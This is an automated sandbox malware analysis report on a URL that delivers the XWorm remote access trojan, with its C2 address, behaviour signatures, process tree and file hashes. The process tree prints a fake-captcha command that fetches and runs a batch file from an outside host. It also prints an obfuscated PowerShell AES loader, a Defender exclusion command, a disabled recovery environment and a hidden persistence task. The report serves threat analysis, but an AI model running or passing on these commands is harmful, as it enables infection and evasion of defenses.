Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

URLScan

urlscan

1

http://klck.tube

windows10-ltsc 2021-x64

http://klck.tube

windows11-21h2-x64

6

Analysis

  • max time kernel
    64s
  • max time network
    66s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20250217-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    01/03/2025, 22:32

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    http://klck.tube

Score
10/10
xwormdiscoveryexecutionrattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

45.43.2.16:7232

Mutex

jG2dh7zTLhyaOqCH

Attributes
  • install_file

    USB.exe

aes.plain

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 9 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 17 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • cURL User-Agent 1 IoCs

    Uses User-Agent string associated with cURL utility.

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument http://klck.tube
    1⤵
    • Drops file in Windows directory
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1056
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffa9b2dcc40,0x7ffa9b2dcc4c,0x7ffa9b2dcc58
      2⤵
        PID:4748
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1828,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1824 /prefetch:2
        2⤵
          PID:2100
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2120,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2156 /prefetch:3
          2⤵
            PID:3392
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2436 /prefetch:8
            2⤵
              PID:3336
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3040,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3068 /prefetch:1
              2⤵
                PID:4464
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3064,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3132 /prefetch:1
                2⤵
                  PID:1156
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3028,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3656 /prefetch:1
                  2⤵
                    PID:3592
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3368,i,18274812502548812325,12226281542450358315,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3356 /prefetch:8
                    2⤵
                      PID:4588
                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                    1⤵
                      PID:1996
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                      1⤵
                        PID:4184
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c curl.exe -k -Ss "https://sapyapp.org/mait.bat" -o "C:\Users\Admin\mait.bat" && start "" "C:\Users\Admin\mait.bat" By pressing OK you confirm you are not a robot. By pressing OK you confirm you are not a robot
                        1⤵
                          PID:1240
                          • C:\Windows\system32\curl.exe
                            curl.exe -k -Ss "https://sapyapp.org/mait.bat" -o "C:\Users\Admin\mait.bat"
                            2⤵
                              PID:3916
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /K "C:\Users\Admin\mait.bat" By pressing OK you confirm you are not a robot. By pressing OK you confirm you are not a robot
                              2⤵
                                PID:4092
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\mait.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('K0BTCplNEu4xWCs9ShbHa0yURls1psj7JSolVBLuLeA='); $aes_var.IV=[System.Convert]::FromBase64String('RPyhP/lrLEy4oKyAVdA4ng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('By pressing OK you confirm you are not a robot. By pressing OK you confirm you are not a robot'));
                                  3⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Modifies registry class
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4644
                                  • C:\Windows\system32\reagentc.exe
                                    "reagentc.exe" /disable
                                    4⤵
                                    • Drops file in System32 directory
                                    • Drops file in Windows directory
                                    PID:4052
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1860
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Realtek-Audio' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Local\Realtek-Hub\hey4qhabjg39.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:896
                                  • C:\Windows\System32\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Realtek-Hub\hey4qhabjg39.vbs"
                                    4⤵
                                    • Checks computer location settings
                                    PID:5344
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Realtek-Hub\hey4qhabjg39.bat" "
                                      5⤵
                                        PID:5408
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command $batPath_var = 'C:\Users\Admin\AppData\Local\Realtek-Hub\hey4qhabjg39.bat';function execute_function($param_var,$param2_var){ $obfstep1_var=[System.Reflection.Assembly]::Load([byte[]]$param_var); $obfstep2_var=$obfstep1_var.EntryPoint; $obfstep2_var.Invoke($null, $param2_var);}function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('K0BTCplNEu4xWCs9ShbHa0yURls1psj7JSolVBLuLeA='); $aes_var.IV=[System.Convert]::FromBase64String('RPyhP/lrLEy4oKyAVdA4ng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $return_var;}$host.UI.RawUI.WindowTitle = $batPath_var;$sysIOFile_var = [type]::GetType('Syst'+'em'+'.IO'+'.Fil'+'e');$env_var = [type]::GetType('Sy'+'s'+'tem'+'.E'+'nvi'+'ro'+'n'+'m'+'ent');$fileContent_var = $sysIOFile_var::ReadAllText($batPath_var);$newline_var = $env_var::NewLine;$splitMethod_var = $fileContent_var.Split($newline_var);$contents_var = $splitMethod_var;foreach ($line_var in $contents_var) { if ($line_var.StartsWith(':: ')) { $lastline_var=$line_var.Substring(10); break; }}$payloads_var=[string[]]$lastline_var.Split('\');$payload1_var=decrypt_function([Convert]::FromBase64String($payloads_var[0]));$payload2_var=decrypt_function([Convert]::FromBase64String($payloads_var[1]));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                                          6⤵
                                          • Blocklisted process makes network request
                                          • Command and Scripting Interpreter: PowerShell
                                          • Suspicious behavior: EnumeratesProcesses
                                          PID:5456
                                          • C:\Windows\system32\reagentc.exe
                                            "reagentc.exe" /disable
                                            7⤵
                                            • Drops file in Windows directory
                                            PID:5568
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                                            7⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:5728
                                          • C:\Windows\system32\shutdown.exe
                                            shutdown.exe /f /s /t 0
                                            7⤵
                                              PID:5152
                                • C:\Windows\system32\LogonUI.exe
                                  "LogonUI.exe" /flags:0x4 /state0:0xa39ca855 /state1:0x41c64e6d
                                  1⤵
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of SetWindowsHookEx
                                  PID:5292

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
                                  Filesize

                                  649B

                                  MD5

                                  2f109a93596f30bfe940dff2ca9cac87

                                  SHA1

                                  0b0e244dcadf2484020ac223546359bc6dcc543e

                                  SHA256

                                  0b21fc16268a8e89da9c00554efa79a3850e2832ad3422f4e9c177eb1751219a

                                  SHA512

                                  ece805ea2d4fe4af803195c2403e09abe76aa5c352a6cb61ebe6956f761b7ba40232199b1846600ebb15b173d73cde3088017ca96a646c7d4b3fa25ed3a201a1

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
                                  Filesize

                                  2B

                                  MD5

                                  d751713988987e9331980363e24189ce

                                  SHA1

                                  97d170e1550eee4afc0af065b78cda302a97674c

                                  SHA256

                                  4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                  SHA512

                                  b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                  Filesize

                                  9KB

                                  MD5

                                  73131ac9671cf68564c8198d841e4e1c

                                  SHA1

                                  43f68970f2148dd8a8084acee089e41c5c266a35

                                  SHA256

                                  f62da3550d693cff7d9f38879c23950d3eda98aaab45d07b512025ab41447028

                                  SHA512

                                  56fd3cceb1834336e889350b3ad70e46a55e0201534049bdbdcf1671ad03113352a5da1297b2c996466fd85d399c8a48815c4bd4fdad6e5127e8c039715aa70e

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                  Filesize

                                  9KB

                                  MD5

                                  974a64107b47b4998e93852077deb63f

                                  SHA1

                                  f511e06f3c4cf2cfb0f5219033c3988df33e7e77

                                  SHA256

                                  f03ff8758ee0463c6c8c1ebc32a1684e4a761f70f977172865ddb26cb0bad92e

                                  SHA512

                                  760f1ac659cbbb7fdfc381ba615cdf97587c2d54addc8874042d706e421d6a1a6797ae8427ed242caa60f09e0f38f03f58eb91433eed64ef9c354f1f2a27356b

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                  Filesize

                                  9KB

                                  MD5

                                  28badf556fff1c5ee9757558d4ecfdf0

                                  SHA1

                                  91b6adf9ee650ee60966d943b360e4f38f463e1f

                                  SHA256

                                  7a2b4f26df691d6f02ab31397985eb5f8d667937491e2086351ecf9542b2cc1c

                                  SHA512

                                  a6206087f7c254ee0c5345b9056906886023365041f05cb94c9b951e1dffc066ee3ea88aa8a00c9f3389aecbd04728adda2579587dc277040716008b3bbe7928

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                  Filesize

                                  9KB

                                  MD5

                                  7b354e3fd2c92c920b0ef2ea6c5209c7

                                  SHA1

                                  647b6ddbd3e3ef125ad21f0ddcafcc571184c50c

                                  SHA256

                                  00b207257216d8d7be7f48e1a96831ad82079b7e92abbb6deb2087a1978bf463

                                  SHA512

                                  a4dcc499fe19937e0ef3dbffc372b847526a652873a9a547f1a83b3610ba635808f1477db9bd0e131424bc3520ff8c9efd7355bff08bfeca4377405c5cd68390

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                  Filesize

                                  9KB

                                  MD5

                                  292e172fdf2ba09486d14e5eeac651a7

                                  SHA1

                                  857423cd0e13831a7bef8f907fcd0a5aa589ea91

                                  SHA256

                                  edfadde425a2a04c07e46f9ed966a6d8652c216e085e42db18a13308b31def65

                                  SHA512

                                  423ccbf4e4cca163d62f107ce3c8837586cfb28d2aa5c98e53493175b440ce9f6c4ba8ff23ad60c536410c20f73d3a30f85e4f0608c94275bd6ac35dd606be7b

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                  Filesize

                                  123KB

                                  MD5

                                  9bee302d4c307cb2d6834f6af5f426e4

                                  SHA1

                                  feda7a99964a7f5660d58fb98f9bd7c316116d33

                                  SHA256

                                  a04d3d40c4d1f7c65ea1f4be4e88564af2863e347eb5d4b030dea7c46bf95a65

                                  SHA512

                                  c16a5efcb7ab3183ef93c177fd81cc76f9535ac1b2d2af9fb88cd0ad41259f9ef17c3d445c0f9cee23eb837a8d2afb588633b347166c5d5a1324d9209fc92065

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                  Filesize

                                  123KB

                                  MD5

                                  839de52e3dcb053677223c1814a254d4

                                  SHA1

                                  1df767cbe638dd1c3d3a11870c83d576d5163388

                                  SHA256

                                  54e225f9e690622906a047ed313f3b74425791a0cb6560607a7d763bb6dc143d

                                  SHA512

                                  fa07beddc7f2933aa2fde164a7d845c3e02e6499d2e1c3b744f63e885d248eb8a0f321d8b08cd9d64ccba440abc194c263d609d8e63a5f6b2635f938751d17d9

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                  Filesize

                                  123KB

                                  MD5

                                  3aadfdb65d3626ba71033c98c6be1c5f

                                  SHA1

                                  74964d83ce4db519986b3307f2d042b68e1914cf

                                  SHA256

                                  74e65e61bd4aba2d6594b688a07d51f2299ac290e46bde7cb31f5c492d01000b

                                  SHA512

                                  d5be05f9668e4c1e5dc914b6c1faed1a8eac29e0f7a545066a7546372115eaf318f49c6628ba18516685c59e9378da4d1d05aa12eebabc70bbd7449e7a67dad6

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                  Filesize

                                  3KB

                                  MD5

                                  3eb3833f769dd890afc295b977eab4b4

                                  SHA1

                                  e857649b037939602c72ad003e5d3698695f436f

                                  SHA256

                                  c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

                                  SHA512

                                  c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  1KB

                                  MD5

                                  a9d5a55646a268805a98533fe53dd0c0

                                  SHA1

                                  8e870960de2f16d5688b6d7d8d9f88507220bd8f

                                  SHA256

                                  04f95e259d0a862c42bbf0b81e79cf760a8e223781cb4259f8ca8127d41fe488

                                  SHA512

                                  94a9ac797018a1ca784edffa7452a66b48d46f853904e3789ac0693b6d350a0ab64c3b72e7aa0e33ab884b54c0c87ad3444b41e6fa484eb3159b97fb4424a5e8

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                  Filesize

                                  1KB

                                  MD5

                                  632d7e5a3dbfb6bd0bd8091157840301

                                  SHA1

                                  cfcae76b0425383ba41acb14ad8751c583b629e0

                                  SHA256

                                  6a0933cbfe8e4dacfc49593d6863b9d9182277d81eb5ae65cf7ec5730f9fed5e

                                  SHA512

                                  75ba2c073d716d3ac6d05ef62e16b7b67a3f07dcb7c9f932fd4ac5c19a382de19fcda3aebb00ec4c9f48614c9314f79036229193dd650e3cd2e1ba49d229f982

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Realtek-Hub\hey4qhabjg39.vbs
                                  Filesize

                                  149B

                                  MD5

                                  88dcd5617dd260ed6e8ac935c6a9d319

                                  SHA1

                                  14f90d4f10f4fe776d36198d3e89708b3f521b52

                                  SHA256

                                  8c0f664553ee0f5606b4a301d976f4d463fa8d2b46f81028c51b408a96935b09

                                  SHA512

                                  c87032629d35334ed0230a6ed3762152b27d9b028825a151af624d41393044475a1e959cbb09531988f7d3c55cf1ba4e32919fa1c746820abf08576e7cac7ed8

                                  Download Submit

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nqugeuyh.3jg.ps1
                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                  Download Submit

                                • C:\Users\Admin\mait.bat
                                  Filesize

                                  110KB

                                  MD5

                                  0a6a8e886c60cb2383fc81845f882d89

                                  SHA1

                                  04f7ccd541b649300d312feaf7320db31d246baf

                                  SHA256

                                  50582f0d3bafcb7271fa8e82e7a3ec79c839f92d06168f51ee8a11ab3799e718

                                  SHA512

                                  5d35d245d5e14e2144774a8ac98b8f922b86a716cc9d448be83365dc377c5d74b630e0b773d05cbea13e95d680e4fef9fb73d63cd9c90b750c69723931dad54b

                                  Download Submit

                                • C:\Windows\Logs\ReAgent\ReAgent.log
                                  Filesize

                                  2KB

                                  MD5

                                  89b53a0f8b97d0ffa14f72ec4dfa6cc0

                                  SHA1

                                  ee1c97c397d1aaec43dcbdae638b4f0441f8ef5e

                                  SHA256

                                  cea6625f474937dd1c7bc4f37e96718020e7a39acaf93d4f38e330e63e2f0e38

                                  SHA512

                                  c4a5975158d42c710815df963288baf6ff02e0d990655ac676c4fd1e1f20388596b4b54838ffeeac7f034cf98532b30911022d04c70e3f6853b627e84fb0c7cb

                                  Download Submit

                                • C:\Windows\Panther\UnattendGC\diagerr.xml
                                  Filesize

                                  13KB

                                  MD5

                                  9b600733923fe66877356b4a5b3f86ba

                                  SHA1

                                  6765a9937938ef2e1094eed46a80a93ea11cb0b3

                                  SHA256

                                  be59442f642eacf45f3bd4ae6e440edfcf9a25d735e2aec603091e2a9648d58b

                                  SHA512

                                  e3263eb5caabd64e369dd9163c7d84a0097a5d70940cc5b8753a506c2d7ca036b5362b42aad7ded023edbcb55fd6d005eef28f3fd8de8adfb8fbcb84fa017d43

                                  Download Submit

                                • C:\Windows\Panther\UnattendGC\diagwrn.xml
                                  Filesize

                                  14KB

                                  MD5

                                  07a977d03775ee2920b9ae12dfb702f7

                                  SHA1

                                  69f732ef9d6c8f1dda5cfe6d65523c3844cfce0b

                                  SHA256

                                  a9158f006fd905583b5eab76007d4f82734d4b9c4f872e9b3c46eb9221803a28

                                  SHA512

                                  b54d068dae10691b57587652ad436cde6daab9aa4978921ea82b594d2f42df54ce632fa4ffb10e9a30452d1afe3a75dfae700e61e927a4f7b3d9434b063e0318

                                  Download Submit

                                • C:\Windows\system32\Recovery\ReAgent.xml
                                  Filesize

                                  1KB

                                  MD5

                                  44b2da39ceb2c183d5dcd43aa128c2dd

                                  SHA1

                                  502723d48caf7bb6e50867685378b28e84999d8a

                                  SHA256

                                  894ee2b19608d10df4bf8b8f5bbcf40ce38c09c1f4c5543b6164f40c04bb270d

                                  SHA512

                                  17744dcaddb49f17fe67dc3a579f4df2b6c2b196776330b71edfc58b37d1f8ae477bfb718d2f23401b78b789b7f984b19341f50fbecfba1bc101f596dee40604

                                  Download Submit

                                • memory/4644-73-0x0000018C056B0000-0x0000018C056B8000-memory.dmp

                                  Filesize

                                  32KB

                                  Download

                                • memory/4644-74-0x0000018C05890000-0x0000018C058A2000-memory.dmp

                                  Filesize

                                  72KB

                                  Download

                                • memory/4644-72-0x00007FFA82780000-0x00007FFA83242000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/4644-158-0x00007FFA82780000-0x00007FFA83242000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/4644-71-0x00007FFA82780000-0x00007FFA83242000-memory.dmp

                                  Filesize

                                  10.8MB

                                  Download

                                • memory/4644-61-0x0000018C05860000-0x0000018C05882000-memory.dmp

                                  Filesize

                                  136KB

                                  Download

                                • memory/4644-60-0x00007FFA82783000-0x00007FFA82785000-memory.dmp

                                  Filesize

                                  8KB

                                  Download

                                • memory/5456-147-0x000001EB38880000-0x000001EB3888E000-memory.dmp

                                  Filesize

                                  56KB

                                  Download

                                • memory/5456-168-0x000001EB50DF0000-0x000001EB50DFC000-memory.dmp

                                  Filesize

                                  48KB

                                  Download